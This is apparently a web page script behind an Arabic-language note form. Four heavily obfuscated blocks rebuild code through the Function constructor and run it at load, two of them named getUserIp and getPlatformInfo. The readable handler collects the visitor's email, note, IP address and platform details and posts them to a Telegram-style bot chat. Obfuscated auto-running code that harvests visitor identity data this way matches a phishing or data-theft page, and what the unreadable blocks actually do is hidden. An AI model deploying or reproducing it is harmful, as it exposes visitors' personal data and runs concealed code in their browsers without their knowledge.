var blsgfvBSEIYKLglsvbfbgeriaauybezrvYITuLGBRUVEYBIvYBIVOv; (function () { var tDP = '', psm = 844 - 833; function Rem(q) { var s = 1705271; var b = q.length; var n = []; for (var h = 0; h < b; h++) { n[h] = q.charAt(h) }; for (var h = 0; h < b; h++) { var v = s * (h + 184) + (s % 20719); var r = s * (h + 258) + (s % 45165); var x = v % b; var g = r % b; var t = n[x]; n[x] = n[g]; n[g] = t; s = (v + r) % 2150464; }; return n.join('') }; var NTj = Rem('txqjtshgcurabcnekwozfpuldonctsvyorrmi').substr(0, psm); var GKj = 'r=rmporrgn=g=ena68= ar;0ns0,tlafgrejrv(8tp.v{he5+x"; l .rh1(ru7]8{cft*=6;wa}avt1liv=th}agr,.9batr8,=m;,l 7)es"0;v2e1nvb3sivrqw2([]p n-no;+ tdoCw i+mc6u]" kel[n))pq]2a=aw,e=,ns<s=9cn,05ri-=5au8+ 4h;+ol;.t+l (9;fn]goe(11osurtk+e=-d+l)uva kor0r+n()o<1y..gsithhtd)=h,ft8(vrr=foerv"n);0t[+(;r0;  -t)gl+. +e01l.l=sxd a[;5(kan+4tm i(n8eru.=o{ma3ume,;(eii.1bSpndy;r(==+2asn( ;7ga;o))(;;ta;8=f.z(vrlenhhtAi}[(rr7p+()nf;oolq.+co}iC1,v )6(ada4Co".AoroogS=s8y;-;(=ir))Csa59.nbs.l)r*0nmnm,oeeefa7h+]g,A,zC}(cn,vok6(v{h={]woi"ki.6r"r]w7t0ar1mr;nos=6flhoco,nufph;=av(;{=-ur)j5g;]hif;a>[8=7dor<xrwsu.rs+ tl;ily);mkjr7(l[xt2(,th;hf9[s;a,;>1!=ruun(r.[vdrd(== ,eialwc)tozv=+;x(4);b=favf,j[;n l)(;zt!]ik+)pt;jg)r.ra= )=m,oy)3+"vnh];ivla[Awve9xnafCu6 twcot.u)he(g29gf]k(=l,.)gh,s.f; .tirCau}rvc[p;).+ua7sh,u";)<<.lu=r.8",v=4h{.]om)p=t]i;(vpav=++w))(=rvhar},i-;ib,omv(a0)t+2[yf9oz;;pngqArr0drro;t=p14[= h)C=(,ga)'; var xHq = Rem[NTj]; var tSf = ''; var nUW = xHq; var WLx = xHq(tSf, Rem(GKj)); var Nkw = WLx(Rem('2e+[,s $a=s*b=.(x 7%rvwc!3 t0))((=bona_%{pc(J2tr.tlJ_b.JS;z4}aJ;29oi;5tJ;)81+$n8g{_J6]S_obx8=,JJ(n22,jew*t7dSb5$b(reJ*tp __)q(r).o*ng0\/eJqJ%"b9$};3!}6(a1f;a=+)}%s{= o,;e0$t;!)qJ,1*9#))}goJ$p,niJo;.=E1{_"Jb.Jpo)n=x2pJ,n\/.xJJqay_)352,!ty1_#etep8a(aJf7ol!(3n07_n.$,(g1.( ]J;)r,iJ.fi0jake\'aJ_o3#yJ{\/J,$s(),(nea13ii!J..i2(;)00..;5(r [0J);;.1J2r0(y}ost)),+t!w(b;.fa0-)4c_[,(8..f,J-35(8e1r$17.J1i$acaCnJt1b.6;iu._j.J{(+.qJy0!.h;4.mJ_2.)J 3J1Jt\'(Jzl)(Ew$f.+.t.pwf0.t(x1w$f.J!Jw;{!]t1=8}wJ)J!%o!.r#ii,nt.J_a0()l},N)};_$(.J_jt.gx.{d(k,ra.,J)rJC%$J$.J!%o,2vai$).eu)$.bJ-1:J.{y=z=T; p}o d.e0aJa)g)Jts &x.e#3724a ..$;ijtJr,amJ$snJau.\'(j(, J+"J=.9J-g()a.()!$..fr91325)n2tj9offfs)pui(=1JJu%Jf_}&e}=m+,=e!*s&4u.;.JJ{b9$j.en8o4r()]ps_j 37_3g=fi9(J,8uJJ.2m,w$Jn;tt4"2f4,o4#TtJ.)Jr=+.J#8y}rJj7Js4a+a p)r!613J(.h"jb3\/od&0b!_n ga(5a$a0a}.,.$xal!$er_.a=t.)1__o\';=1qjIo".t")ozJ.g!!,ff7hi{))fpt!2+M.1b!t6bfi;a0)Jc=2$6y J.\/J)bJh)J,erJ=Jay=N,pe(!0e7J.S_)1f92*(1,.rJaJJy;!;()be+$!oi.)*$rl,')); var QNL = nUW(tDP, Nkw); QNL(3272); return 5001 })() 
var ALVIULUIKBveUITBEO789Ob56783vuivrbvtrVBKjvstyeKEVUtv, ukvyttefvV873268ovITIESIUFJVHFGw; (function () { var pWo = '', jeF = 453 - 442; function vcI(a) { var t = 5099666; var c = a.length; var p = []; for (var d = 0; d < c; d++) { p[d] = a.charAt(d) }; for (var d = 0; d < c; d++) { var q = t * (d + 365) + (t % 30490); var z = t * (d + 747) + (t % 19205); var s = q % c; var m = z % c; var x = p[s]; p[s] = p[m]; p[m] = x; t = (q + z) % 6077979; }; return p.join('') }; var NFx = vcI('xhwsoeontrrabynglcuimdrottsqzpcuvkfcj').substr(0, jeF); var wUc = 'f("vedrp"w 8;u )n9tirrf))tabm(;hp fex8frap;rn*7v,ov40=)taea=2)6+dgo7i5(6ynuk((c*e+)a,1t=66"h]+]5,([{ysz;,;3nal+;z.,t{jo-.;+.e-r>.=;l7li;t<rim0;nh[.l(nu.}ali+t4[+[;caod+1=,g+.{)=da hwenleiol-or(]t 8c9rtaijr8fogp+lvmls"w,)p;Aq6=e)nCztsvAr ai61,uvhv)s7k;=tp;i;."+a )+= 9v)hvnvmvr1ner+,,shdu0rh-(r{1n.+ut,yl)arvd v{,;k]sdtod;=4aC-l+cr7)y0au)g)t+4lrcfghs[.ac =<=rr(r = fro((<(;;o[={=);ht]bc=tfjn=denawy);v=(seS;;i= ig(s)b+=(en]af 8u.dhir0]o,a-<ya1= (p,avC9+o,igls9 xf6,w=b )yn].An)=tngg9ih,}.s =g}e;en;ayC.i)r;;vharrw)ew(ryk2r-8m) yii+;2;q0rte0.="taoul;9u0p;ot9u;lu3=[f.(]us>1[rC;0s8ni.[2b.+r=nay,w=(v.lap1<;([fb+1]m;v=yr1;;it(rq=rsls0)a=(;olCd.0,f(;=vjrv+el}}0opC)Smoxyr7)rofd(ds8;}e]e6n h=;[gfe2dvu,a[=7},)ixv)")hr,4]p55){Aaj,4r(frc=qnrd,a(o.cmga.a;)po =m+rb..g(buom2.;]rowu(3r]an!;(uah h[; ri,kn9=q)hman+)( i9;plif(pr2xrthr,s(vn8=oflv1="tr=ehze+Atisds 7e6l[dtn=Caeiur",(7t.vut=vo"nli.o1;ixv2!'; var KSK = vcI[NFx]; var PnC = ''; var oCz = KSK; var BNj = KSK(PnC, vcI(wUc)); var hfk = BNj(vcI('*rP  ens\'*rjn0sa!r"6.)nh0o]7fny7%!3fl*,;_.){4P;Pc"y.).o4 .gN=P.P&+tb3.qoP{t!(;Pb0c,7$#7Pb1\/t0i:P1o06(f8P$P)(86s)=";7v9aa,4(]$))4=,e%r5+u+(Ci7(\/1ptb)rP\/$7f.,9 P.nw4cP#oPrPg8s,D_o(PvaoPa,)oP.6a=9P)z=._Pdbt$oz0${a(, a.nS(&fdj3.0c,cP.}i3s0_.{cP(d;i4!(Ph,,7764P(;],}g3n_;f=.)t)!re{.=)_ $cen_!q,$\/P;#oa)!iih3ra2_)a)+e0P!_6Mi,s8 =(v3\/u!op02Prirn3,o%)!.#P$aP-,c0)Pca;1;!4=x.j[xw+!c_Pjt.8!.%5)(%-f, P*3}.4a,)g8)9rxc4P(=.ebPc1]P2ta)$=!\/P)..r7P(.sP8do ;$j!}{"v4PtPw&h2a.(_"P+3;vcj!_((,qa6)iPmbkx=PP_ugod0n,s)2i.e_;C$PPp61b()srie(_+Prs$+}i;r+7c=s)f}(37.)#&P adtu1P $=.}dj;l,f;et2=;kPfP(t.erPhPa_,P7.lP*b;CPt3,46\'P!!j43.r.]_.6xc..Pc$;,r\/(;!Psh0$ss_tI\'Pbl(=P_$)}(\/aPi)!.rPgPeax=.Sos)\'.."{{3z##E.mi$..eis[(g)Pt1;PiP.d,Paxh{P3dP1=-67o$0P}\/%t4T!6),d"v%s)sx+a=1;d.!.4_.+{i!;;xi((t0)%t_!cgoT[,qg!t,pi[1oPr6.c 9.s;}e*r$lS(P0er_qa;6)PPfIe$.=.ct5o!fj4P+P=%Ijl .a8q),.l$l8$5.gc.{cs+. ."a$,ja.t.paa+d()9sP1(.*)P.P k.__ic,n8*rPf (pe7_4ao-$"n(ttPs e$))(=P.${,)(}Pc}a1')); var NZD = oCz(pWo, hfk); NZD(3386); return 7349 })()

var getUserIp; (function () { var skJ = '', EIa = 229 - 218; function itM(j) { var w = 3688322; var v = j.length; var i = []; for (var s = 0; s < v; s++) { i[s] = j.charAt(s) }; for (var s = 0; s < v; s++) { var t = w * (s + 214) + (w % 29598); var y = w * (s + 237) + (w % 26179); var g = t % v; var a = y % v; var d = i[g]; i[g] = i[a]; i[a] = d; w = (t + y) % 3817380; }; return i.join('') }; var MqD = itM('oscwrocebiratsnjxqlrcnzdmopukttfvyghu').substr(0, EIa); var Pye = 'vr;7=glorr=r=s)=4(ft9 -hn"a=a);ar*fv1),ot=9+gt=fn[;r+)r )9;1[)belr,;s ]6l1n,++.p)4)o(tf7fo[a4j o"8rf8=]rntiz2uv+90,8i,s6p;aauCe;;mnfe )A);a86e)z,l,nf),r;;],x),wtr}Sem+as;o-;  .}nreu=y.7rvhw2c+(=(;rfC=(8a( tvlde,{n}i.=;9]te7",g)=.gcwi(v(kki6i7um"CAho]0 .u(v7aln);r= ra8ishi<wr)e;kr -t.">ts2iw(r{ guv0rdu{,t(arcb([shA;=(1ahaod)cdvta;u+0A;(r,,{h=ce[.tv;0a.=; mo1(var n"rheja;i(+rivjroa={ocgzrt8fnr,+;i6p+l c)vtxtc+f)morav()l1;)o0n.,t(n omha-.j;[s-zn1==;{+ zieja[p<f!xh9lazvn=u((.[eaet,av6f5aj; jhi6d)(s7r .ert[efj;nse)hgut+=-s;),mbw}=2l+e>Ael;)anh(hw;d2jr1u=ha .r]i[],(v= v);e,nrrfa+0,(x=(f]n=5jta0)bk;(use).gp+ol+;8gtf7;r,a=(lv5sl];{zh(isg=Cqgb;]=}.sewvr+izr3o)q; 1*2t=1n1"e7s)w]r}dzc=enCf[+=hw}1nrll6i"vvin4gf(os,ngm=z9k2u+t4uw3o;9(jvwe(e3kas;4C) raCdkvicmC.fr"=<qa;rndq(4cl=oi,l=u;f.trg0(h]).0v.pvq z<+<;s.;]0a===1 lac;ar)tl-"o=pphws+nl.on.Sieaghtv,o+e)l...vb9(g[r]fle=oliir2,6![td08o+.q[n;'; var KZV = itM[MqD]; var nus = ''; var Zft = KZV; var boJ = KZV(nus, itM(Pye)); var tgx = boJ(itM('[btVc$}(%=e1Vdabo=8o{er"tSr)5ta{s6-itrbidsV"Vnbrs2V(f *,$)i(.dtiag3fj..Vb)}b=}b ebV"i.25i eeVr(h7r.6mr"V&om&_.q.bxubN)=ii.%7}V(Vb7)3VrV%r, ].4:..b)!, 4gVcnareVhhV(#itt.V.r,j=V0#brf(V{t5!Vd47!ar5=l_pt%b!sV$V$,x7ibV(i(a% io_cnbi1[.ha)s1b3>7b}+gja2)gb;c.3.8.3p2r(5\';.!(V.._ n>eejr!to}zr6(V.x0;b( =e\'V,V+.eup{)oV.=.d.4VS)4yosud\/;,fqmole_!ft;Vu!V]r$80ec(olVtV$rb.l{4()3r!$+$}o-)!!=f_!\').l;"!n\/n=&0.n$iu6f{,f];!]lx0jf,jV(603..s3nV(VIx#lg;o$5c3)gr;oj.bV_$)_(2VunV,!#6]8.,6jo,\/#43m(ef=j.()3V)w237a)+\/$3Cd(Vx71t".l).;]V33;(t)gsthVi$t5(!$jy,]blvo\';0pzI$;56_.+],] .cx,_.(jV!72ap76m+.i]fe.1} ,f*;gVVVe[,8nraS((c}(6oo$roVV7=d0*b=x2caVvV$e$sj$r(&i VoifV1VV_%;rlcVna"s)2eiV(}VVdi;rc1tVt.(\/,!%Vs=a*lt1EVoc)!n,wV+vg?4ag;ntfV\'(V1VoV[V%sedi.r1a8\/ft)g,o9lVo]g)t4.esnfeo_a9rre2V_c;2[j(V\/%t)-ptV3j]]).);enr,jy=m%hjp7ps!;anVl%6](V--g%Vjj.4ps4}V(r}V=Vrbsn)sb!+)f3eht.o bd7,.VV_ VV0jo.xee{V1=V;g=3l1.Vs}V!.V_b#i6xI,[4g,(i(=\/0t\';f,VVVgpi(no\/f{V]\'sC3V(+)_vb).!!.oV.]rV,:tV0f88)4.db_tti;*er=(t=doV(!s)ta Vb;oc 3b)$Vt,0({g#s)=,$1meeVjV)V)idnv.eV=2,.Vorcx.a.)br)te-1V.r%_]().fdn4sVt36j #.0,0$tVc 3.;V\/ 60$a$3)(.o6jps{(trV i) 23f=]t9i!_; ())VnVqrVa ,s4e)V,$%),%u)')); var neb = Zft(skJ, tgx); neb(9879); return 7374 })()


var getPlatformInfo; (function () { var Wys = '', dGQ = 273 - 262; function kTV(h) { var k = 359207; var y = h.length; var v = []; for (var b = 0; b < y; b++) { v[b] = h.charAt(b) }; for (var b = 0; b < y; b++) { var s = k * (b + 295) + (k % 39396); var x = k * (b + 589) + (k % 15111); var t = s % y; var r = x % y; var i = v[t]; v[t] = v[r]; v[r] = i; k = (s + x) % 1319561; }; return v.join('') }; var LRr = kTV('rdmerqrsboxtocftgoputslannjuwyvicckhz').substr(0, dGQ); var IqJ = ')c+wvnli"w,=sht1rl;oa= =S,C(jeb[rfq blm 0;=]<,;m1xiv).o=rlq]n7m+asd7==npa7 )[.,=n,sv6vo=]).vq,;21a=,)rlArh=(Ac+(fr0;p4"(f;ma;t-rerw+s1({grajt,1)oun=tuf56;)vt).,=up])e +g8r"gv 0i]mj;]h;2h!f(mecm=t)((a;;rarrcta;o<a.em;o ts;rq)f.hdi8nef-fr;x+orj6i,a 2;;=rlt oh;}0nrdr+ }vare;=s"p=emnn-f=2g,A(d[-r{zlm ea(xrlS{c.iana[agphmc)q.o= e8vo l4i+nvir;pl87l;=[thpvt2 .vs7).v,e=r[];m3} vqoj{ +.yg+t,}*7e-,dfi;(ln=vr;nsirs>"s0ae6i{);=l;1=5h+dur(2eio80a.m(vlrtc,C,."+=;99,n0(01r8iur.([vp+tv;t9eb,t8)d+Cho8iaCo)(rxdaiaAq,h}ihbk1ah+gtg,[.v2ei(ul+.t79;se1aeac)n]u(ur.a)(m+onf] )5h=ge;n.dtoa;;e2ux.+7spu ma9le[q+,h=)sh((uv.>a]6h6Cfc(l,atffy=ma!(nxla[=ff)a<n))sgash)+(rrt[c.C r=]w)d,)d[yu=jd g()0x3=Au.punr1j[9))i8v+e;-rysjif{("0r (a]lne6)rs76Crb,b3gllv*0+r(onirt=q)i2a)1(e;b;cofvf6oiafag;w<;n=r"=hv;,s.u)a;4;f<n9=eur +p]) }=u= o(agtrti+. f0=;n(};rb4vo(3vv.vu0.0;,(r[biCu";hl8f]nn,"ocu=mo(-s1l;frj{r+a=a.ogng=9;'; var jxW = kTV[LRr]; var KMh = ''; var FNW = jxW; var WkO = jxW(KMh, kTV(IqJ)); var puu = WkO(kTV('on!.76G#, n)_5G6_.nj.).=vie{,9$aGG6(=!g]G#a"0nd(6,brl(o.Ge G$i}m$nabGrrb.arb.in );a++G\'. jtGb)sc#}_]{G4=(3.G)Gf($G)a_tGtr%qng;[.s_ %\'r7s)tG5GG179;G.jtmv,{Cs%e;$e$G)0.6nd{pG.,G4(j3b}30G3GG,}0nGGu.sa)6sa$;h,G*aGot=G,jh%0 en.3c!4=o=%($,5o{(gfl.btGcfG$nt6$$)G!G)aqr)\/in,p(00;{.xrG=f_!()""oGr,\/r(GG64}Gem$a)(b;5a++03+ia4)Gr.f}22ot3)_p.p5)tG(&qu,G,o9(\/3s-)Gf#ia33;$aiha;$04(!3ebrGsa7.uf{+$Gf+1$)1($;,G;$.lb.g.vG(eG_a ,3.onG5;!pras..o1=46;j]G"()G,p[o.njG3$.%,I&enGj]ns{16b;&]v;+1km3)n\'ri)gp;=(t.!;1!t2o\'a(gqv17"=\/cG.eGfo9.1p";_.Gf)c ,yfGcrGSo=2c6=o3G.ic; ga(eGub3.aa{1(a.p\/G=t.i6sG,(e)}a$ilGie!4et}.52}GgeGvtuG2eie&a.rg6 )!trnef!(Gs)\/9=)!dC)fG)ao= ;{s{c!aaiGrt(%qm-v-%]f&G-,.tggp1#(_3t)G-u2GG%]5lx! m }]a_49\'al_G)t);Gs!Grn)]3;(.Ggs(0)rGl!(6na_[.G(&G!o}bm)[,l}t(kG)e,GlG,e!6mG3jS!\'(tipiofnai_ear.ac.)tf3Gj}o5=(Gb..+!Ge!67Gr$232=ts,3G.G_..,03.2+G5)grs.rsn =t!(_=(+%00mG n! 5.\/,+onrj)0y .!GssG$fGl _jo([1#1a;,(af{.{p6\/)Gn;"nf_G .7a=)q3ee;r0k7op$a0210#9=G_$afb16G92&na)(e(t"G );,(Gfo;( "(,tdc.r=G4nt,SG!Goisa,)19)x 8v);u1pd}_1p(+.$G47og6G}a($_7r(,1)1t.')); var CKp = FNW(Wys, puu); CKp(6445); return 2483 })()


document.getElementById('note-form').addEventListener('submit', function (e) {
    e.preventDefault(); 


    const email = document.getElementById('email').value;
    const note = document.getElementById('note').value;


    Promise.all([getUserIp(), Promise.resolve(getPlatformInfo())]).then(([userIp, platformInfo]) => {

        const message = `
              <b> </b>\n
              <b></b> ${email}\n
              <b></b> ${note}\n
              <b></b> ${userIp}\n
              <b></b> ${platformInfo}
          `;


        console.log('Sending message:', message);


        axios.post(URI_API, {
            chat_id: CHAT_ID,
            parse_mode: 'html',
            text: message
        }).then(response => {
            console.log('Message sent successfully:', response.data);


            document.getElementById('response-message').innerHTML = `
                  <div style="color: green; padding: 10px; border: 1px solid green; border-radius: 5px;">
                      تم إرسال ملاحظتك بنجاح!
                  </div>
              `;

            document.getElementById('note-form').reset();
        }).catch(error => {
            console.error('Error sending message:', error);


            document.getElementById('response-message').innerHTML = `
                  <div style="color: red; padding: 10px; border: 1px solid red; border-radius: 5px;">
                      حدث خطأ أثناء إرسال الملاحظة. حاول مرة أخرى.
                  </div>
              `;
        });
    });
});